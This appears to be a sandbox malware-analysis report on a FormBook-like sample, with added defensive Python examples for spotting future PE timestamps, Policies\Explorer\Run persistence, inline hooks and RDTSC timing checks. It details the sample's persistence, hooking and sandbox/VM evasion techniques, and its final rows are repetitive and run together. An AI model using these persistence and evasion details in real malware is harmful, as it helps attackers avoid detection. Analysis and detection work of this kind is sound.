Source: C:\Windows\SysWOW64\chkdsk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\chkdsk.exe | File written: C:\Users\user\AppData\Roaming\0LA072R5\0LAlogri.ini
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\chkdsk.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: vSCyL8NNIC.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vSCyL8NNIC.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: vSCyL8NNIC.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: chkdsk.pdbGCTL | source: RegSvcs.exe, 00000001.00000002.258819108.0000000000EA0000.00000040.00000001.sdmp
Source: Binary string: chkdsk.pdb | source: RegSvcs.exe, 00000001.00000002.258819108.0000000000EA0000.00000040.00000001.sdmp
Source: Binary string: RegSvcs.pdb, | source: chkdsk.exe, 00000005.00000002.478323114.0000000005EFF000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: RegSvcs.exe, 00000001.00000002.258842065.0000000000ED0000.00000040.00000001.sdmp, chkdsk.exe, 00000005.00000002.476452104.00000000059D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: RegSvcs.exe, chkdsk.exe
Source: Binary string: RegSvcs.pdb | source: chkdsk.exe, 00000005.00000002.478323114.0000000005EFF000.00000004.00000001.sdmp

Data Obfuscation:

Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0xEBD2DDE0 [Tue May 17 10:05:20 2095 UTC]
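A link timestamp in 2095 cannot be genuine: packers and builders routinely write a random or deliberately wrong value into IMAGE_FILE_HEADER.TimeDateStamp, so a stamp in the future is a cheap static triage signal. The Python below is an added example, not code from the report or the sample. It reads the stamp from a PE image and classifies it against a reference time that the caller passes in, so the result is reproducible; build_minimal_pe() constructs a header-only test input carrying the value 0xEBD2DDE0 seen above. The "earliest plausible" cut-off of 1 January 2000 is this example's assumption.

```python
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def pe_timestamp(data):
    """Return (raw_value, UTC datetime) of IMAGE_FILE_HEADER.TimeDateStamp.
    Raises ValueError when the buffer is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    raw = struct.unpack_from("<I", data, e_lfanew + 8)[0]
    # EPOCH + timedelta handles any 32-bit value; datetime.fromtimestamp can
    # fail past 2038 on some platforms, which is exactly the range of interest.
    return raw, EPOCH + timedelta(seconds=raw)


def timestamp_verdict(data, now, earliest=datetime(2000, 1, 1, tzinfo=timezone.utc)):
    """Classify the stamp as 'zero', 'future', 'too-old' or 'plausible' relative
    to the caller-supplied reference time. Zeroed or reproducible-build stamps
    are common in legitimate binaries, so treat this as a hint, not a verdict."""
    raw, stamped = pe_timestamp(data)
    if raw == 0:
        return "zero"
    if stamped > now:
        return "future"
    if stamped < earliest:
        return "too-old"
    return "plausible"


def build_minimal_pe(timestamp):
    """Constructed test input: DOS header, PE signature and COFF header only.
    Not a loadable image; just enough for pe_timestamp()."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine = 0x014C (i386), 3 sections, the stamp, then the remaining 12 COFF bytes
    coff = struct.pack("<HHI", 0x014C, 3, timestamp) + b"\0" * 12
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    sample = build_minimal_pe(0xEBD2DDE0)  # the value reported for this sample
    raw, stamped = pe_timestamp(sample)
    print(f"0x{raw:08X} -> {stamped:%a %b %d %H:%M:%S %Y} UTC")
    print(timestamp_verdict(sample, now=datetime.now(timezone.utc)))
```

For real files, pass the whole file contents to pe_timestamp(); the same function also decodes the stamps in the debug directory and in export tables if you point it at those offsets, but those live elsewhere in the image and are not parsed here.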
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_00995C4B push ss; iretd 0_2_00995C56
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_009955CF push cs; retf 0_2_00995C20
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_00999302 push ss; iretd 0_2_00999606
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_00995C21 push ss; iretd 0_2_00995C4A
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Code function: 0_2_00995B66 push cs; retf 0_2_00995C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0040E2E8 push edi; retf 1_2_0040E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041CDF5 push eax; ret 1_2_0041CE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041759B push esp; ret 1_2_004175AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041CE42 push eax; ret 1_2_0041CE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041CE4B push eax; ret 1_2_0041CEB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041CEAC push eax; ret 1_2_0041CEB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0040EF48 pushfd ; ret 1_2_0040EF4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041778F push ds; ret 1_2_00417798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00416F93 push ss; iretd 1_2_00416FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F4D0D1 push ecx; ret 1_2_00F4D0E4
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_05A4D0D1 push ecx; ret 5_2_05A4D0E4
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0125E2E8 push edi; retf 5_2_0125E2E9
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0126759B push esp; ret 5_2_012675AF
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0126CDF5 push eax; ret 5_2_0126CE48
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0125EF48 pushfd ; ret 5_2_0125EF4B
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0126778F push ds; ret 5_2_01267798
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_01266F93 push ss; iretd 5_2_01266FA4
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0126CE42 push eax; ret 5_2_0126CE48
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0126CE4B push eax; ret 5_2_0126CEB2
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 5_2_0126CEAC push eax; ret 5_2_0126CEB2
Source: initial sample | Static PE information: section name: .text entropy: 7.93708714447

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\chkdsk.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 1BULU
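Values under Policies\Explorer\Run are started by Explorer at logon just like the well-known CurrentVersion\Run key, but the location is missing from many persistence checklists, which is why a hunt has to name it explicitly. The Python below is an added example, not code from the report or the sample: it runs such a check over registry "value set" records (Sysmon Event ID 13 flattened to one text line each). The record format, the sample events and their Details paths are constructed for the demonstration; only the writing process chkdsk.exe and the value name 1BULU are taken from the row above. It also folds the WOW6432Node view and the long hive names onto one canonical form, a generalization beyond the single key observed here.

```python
# Autostart keys under Policies\Explorer\Run. Explorer honours them at logon
# like CurrentVersion\Run, but they are absent from many persistence checklists.
POLICY_RUN_KEYS = {
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
}
HIVE_ALIASES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU", "HKEY_USERS": "HKU"}


def normalize_key(path):
    """Canonical form: short hive name, WOW6432Node view folded onto SOFTWARE."""
    hive, _, rest = path.partition("\\")
    hive = HIVE_ALIASES.get(hive.upper(), hive.upper())
    wow = "software\\wow6432node\\"
    if rest.lower().startswith(wow):
        rest = "SOFTWARE\\" + rest[len(wow):]
    return hive + "\\" + rest


def is_policy_run_autostart(target_object):
    """True when the written value sits directly under a Policies\\Explorer\\Run key."""
    parent = normalize_key(target_object).rsplit("\\", 1)[0]
    return parent.upper() in {k.upper() for k in POLICY_RUN_KEYS}


def parse_event(line):
    """Split a flattened 'Field: value | Field: value' record into a dict."""
    return dict(field.split(": ", 1) for field in line.split(" | "))


def find_policy_run_writes(lines):
    """Return (image, value_name, details) for every value-set event under Policies\\Explorer\\Run."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventType") != "SetValue":
            continue
        target = ev["TargetObject"]
        if is_policy_run_autostart(target):
            hits.append((ev["Image"], target.rsplit("\\", 1)[1], ev.get("Details", "")))
    return hits


# Constructed Sysmon Event ID 13 records, one per line. The first mirrors the
# row above (chkdsk.exe writing value 1BULU); its Details path is made up. The
# second uses the documented Run key, the third is a Policies\Explorer value
# that is not under Run, and the fourth is the same key via the WOW6432Node view.
SAMPLE_EVENTS = [
    "EventType: SetValue | Image: C:\\Windows\\SysWOW64\\chkdsk.exe | "
    "TargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\1BULU | "
    "Details: C:\\Users\\user\\AppData\\Roaming\\example\\payload.exe",
    "EventType: SetValue | Image: C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe | "
    "TargetObject: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive | "
    "Details: C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background",
    "EventType: SetValue | Image: C:\\Windows\\System32\\svchost.exe | "
    "TargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDriveTypeAutoRun | "
    "Details: DWORD (0x000000ff)",
    "EventType: SetValue | Image: C:\\Windows\\SysWOW64\\example32.exe | "
    "TargetObject: HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\Updater | "
    "Details: C:\\ProgramData\\example\\updater.exe",
]

if __name__ == "__main__":
    for image, value, details in find_policy_run_writes(SAMPLE_EVENTS):
        print(f"{image} set Policies\\Explorer\\Run\\{value} = {details}")
```

The documented Run key is deliberately left to whatever rule already covers it; the point of this check is the key that such rules usually omit. On a live host the same predicate can be applied to the output of a registry enumeration instead of event records.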

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE7
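FormBook is known for hooking user-mode functions that handle window messages and network sends so it can capture keystrokes and form data; here the sandbox observed that the first bytes of PeekMessageA in explorer.exe no longer match user32.dll on disk. A memory-forensics check reproduces that comparison and, where the overwritten bytes form a recognizable trampoline, recovers where the hook jumps. The Python below is an added example, not the sandbox's detection: classify_prologue_change() takes the on-disk and in-memory prologue bytes of one function plus its load address and reports the first differing offset, the trampoline kind and, when decodable, its target. The three stubs it recognizes (jmp rel32; mov rax, imm64 / jmp rax; push imm32 / ret) are common hooking choices, not a claim about what this sample uses; the six bytes reported above match none of them and so land in the "unknown" bucket, which the example still reports as modified. The original prologue bytes and the addresses are constructed.

```python
import struct


def classify_prologue_change(original, current, func_addr):
    """Compare a function's prologue as stored on disk (original) with the bytes
    currently mapped at func_addr (current). Returns None when they agree;
    otherwise a dict with the first differing offset, the trampoline kind if
    one of three common stubs is recognised, and the decoded jump target."""
    if original == current:
        return None
    first_diff = next((i for i, (a, b) in enumerate(zip(original, current)) if a != b),
                      min(len(original), len(current)))
    info = {"first_diff": first_diff, "kind": "unknown", "target": None}
    c = current
    if len(c) >= 5 and c[0] == 0xE9:
        # E9 rel32: target is relative to the end of the 5-byte instruction
        rel = struct.unpack_from("<i", c, 1)[0]
        info.update(kind="jmp rel32", target=(func_addr + 5 + rel) & 0xFFFFFFFFFFFFFFFF)
    elif len(c) >= 12 and c[:2] == b"\x48\xB8" and c[10:12] == b"\xFF\xE0":
        # 48 B8 imm64 / FF E0: mov rax, imm64 ; jmp rax (x64 absolute trampoline)
        info.update(kind="mov rax, imm64; jmp rax", target=struct.unpack_from("<Q", c, 2)[0])
    elif len(c) >= 6 and c[0] == 0x68 and c[5] == 0xC3:
        # 68 imm32 / C3: push imm32 ; ret (x86 absolute trampoline)
        info.update(kind="push imm32; ret", target=struct.unpack_from("<I", c, 1)[0])
    return info


# Constructed inputs. ORIGINAL stands in for the first 16 bytes of an x64
# user32 export as read from disk (a typical 'mov [rsp+8], rbx; push rdi;
# sub rsp, 20h' frame setup plus padding); it is not copied from user32.dll.
ORIGINAL = bytes.fromhex("48895C2408574883EC20488BD9488BFA")
FUNC_ADDR = 0x7FFB12340000  # assumed load address of the hooked export


def hooked_with_jmp_rel32(target):
    """In-memory view after a 5-byte relative jmp hook to target."""
    rel = target - (FUNC_ADDR + 5)
    return b"\xE9" + struct.pack("<i", rel) + ORIGINAL[5:]


def hooked_with_mov_rax_jmp(target):
    """In-memory view after a 12-byte mov rax / jmp rax hook to target."""
    return b"\x48\xB8" + struct.pack("<Q", target) + b"\xFF\xE0" + ORIGINAL[12:]


# The six bytes the sandbox reported for PeekMessageA, padded with the
# untouched tail of ORIGINAL so the buffer lengths match.
REPORTED_NEW_CODE = bytes.fromhex("488BB88CCEE7") + ORIGINAL[6:]

if __name__ == "__main__":
    for label, mem in [("clean", ORIGINAL),
                       ("jmp rel32", hooked_with_jmp_rel32(0x7FFB12341005)),
                       ("mov rax/jmp", hooked_with_mov_rax_jmp(0x27A12345678)),
                       ("reported bytes", REPORTED_NEW_CODE)]:
        print(label, classify_prologue_change(ORIGINAL, mem, FUNC_ADDR))
```

In practice the "original" bytes come from the module on disk after applying relocations, or from a known-good memory image, since a comparison against an unrelocated file will report false changes at every absolute address in the prologue.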
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Process information set: NOOPENFILEERRORBOX (32 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe | Process information set: NOGPFAULTERRORBOX|NOOPENFILEERRORBOX (5 occurrences)

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 00000000004098D4 second address: 00000000004098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | RDTSC instruction interceptor: First address: 0000000000409B3E second address: 0000000000409B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 00000000012598D4 second address: 00000000012598DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 0000000001259B3E second address: 0000000001259B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00409A70 rdtsc
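The interceptor rows above show the shape of the check: two rdtsc instructions six bytes apart with only a register clear and an add between them, so the difference of the two counter reads tells the sample whether execution is being slowed by an emulator or trapped by a hypervisor. Pairs like that can be found statically before the sample ever runs. The Python below is an added example (not the sandbox's interceptor): it scans a code buffer for the 0F 31 opcode and reports every pair within a small byte window, together with the bytes between them. The buffer is constructed so that the "rdtsc; xor ecx, ecx; add ecx, eax; rdtsc" sequence from the report sits at 0x4098D4 in a region based at 0x409800, plus one isolated rdtsc that should not pair. Scanning raw bytes without disassembly can hit 0F 31 inside data or in the middle of another instruction, so treat the output as leads to confirm in a disassembler.

```python
RDTSC = b"\x0F\x31"  # opcode bytes of the rdtsc instruction


def find_rdtsc_pairs(code, base, max_gap=32):
    """Return [(first_addr, second_addr, bytes_between), ...] for each pair of
    consecutive rdtsc opcodes at most max_gap bytes apart. base is the virtual
    address of code[0]. Two stamps this close with a short computation between
    them are the classic 'does this take too long for bare metal' check."""
    positions = []
    i = code.find(RDTSC)
    while i != -1:
        positions.append(i)
        i = code.find(RDTSC, i + 2)
    pairs = []
    for a, b in zip(positions, positions[1:]):
        if b - a <= max_gap:
            pairs.append((base + a, base + b, code[a + 2:b]))
    return pairs


BASE = 0x409800  # assumed base so the check lands at the reported 0x4098D4


def build_sample_region():
    """Constructed code region: nop padding with the reported timing check at
    offset 0xD4 and a lone rdtsc at offset 0x200 that must not pair."""
    region = bytearray(b"\x90" * 0x300)
    # 0F 31        rdtsc
    # 31 C9        xor ecx, ecx
    # 01 C1        add ecx, eax
    # 0F 31        rdtsc
    timing_check = bytes.fromhex("0F31" "31C9" "01C1" "0F31")
    region[0xD4:0xD4 + len(timing_check)] = timing_check
    region[0x200:0x202] = RDTSC
    return bytes(region)


if __name__ == "__main__":
    for first, second, between in find_rdtsc_pairs(build_sample_region(), BASE):
        print(f"rdtsc pair at {first:#010x} / {second:#010x}, between: {between.hex(' ')}")
```

On the unpacked FormBook payload the same scan over the .text section yields the two pairs per process listed above; a rdtsc pair whose delta is compared against a hard-coded threshold is also a good place to patch when you need the sample to run under instrumentation.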
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe TID: 7088 | Thread sleep time: -49988s >= -30000s
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe TID: 7136 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 1272 | Thread sleep count: 34 > 30
Source: C:\Windows\explorer.exe TID: 1272 | Thread sleep time: -68000s >= -30000s
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 5972 | Thread sleep time: -55000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed (2 occurrences)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: explorer.exe, 00000002.00000000.231338209.0000000005775000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.231267805.00000000056CA000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.231180029.0000000005644000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.235519591.00000000078D0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: explorer.exe, 00000002.00000000.231267805.00000000056CA000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.231180029.0000000005644000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000002.00000000.232658159.0000000006414000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$%
Source: explorer.exe, 00000002.00000000.231267805.00000000056CA000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.235519591.00000000078D0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.235519591.00000000078D0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000002.00000000.231267805.00000000056CA000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: vSCyL8NNIC.exe, 00000000.00000002.221862342.0000000002E34000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.235519591.00000000078D0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\vSCyL8NNIC.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00409A70 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0040ACB0 LdrLoadDll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00EF58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F8B8D0 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F8B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F2F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F2F0BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F220A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F390AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00EF9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F73884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FB2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FC1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F10050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F0B02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F2002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F77016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00FC4015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00EFB1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F841E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00F751BE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F751BE mov eax, dword ptr fs:[00000030h]1_2_00F751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F751BE mov eax, dword ptr fs:[00000030h]1_2_00F751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F769A6 mov eax, dword ptr fs:[00000030h]1_2_00F769A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F261A0 mov eax, dword ptr fs:[00000030h]1_2_00F261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F261A0 mov eax, dword ptr fs:[00000030h]1_2_00F261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F22990 mov eax, dword ptr fs:[00000030h]1_2_00F22990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F1C182 mov eax, dword ptr fs:[00000030h]1_2_00F1C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2A185 mov eax, dword ptr fs:[00000030h]1_2_00F2A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EFC962 mov eax, dword ptr fs:[00000030h]1_2_00EFC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EFB171 mov eax, dword ptr fs:[00000030h]1_2_00EFB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00EFB171 mov eax, dword ptr fs:[00000030h]1_2_00EFB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F1B944 mov eax, dword ptr fs:[00000030h]1_2_00F1B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F1B944 mov eax, dword ptr fs:[00000030h]1_2_00F1B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2513A mov eax, dword ptr fs:[00000030h]1_2_00F2513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F2513A mov eax, dword ptr fs:[00000030h]1_2_00F2513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F14120 mov eax, dword ptr fs:[00000030h]1_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F14120 mov eax, dword ptr fs:[00000030h]1_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F14120 mov eax, dword ptr fs:[00000030h]1_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F14120 mov eax, dword ptr fs:[00000030h]1_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00F14120 mov ecx, dword ptr fs:[00000030h]1_2_00F14120
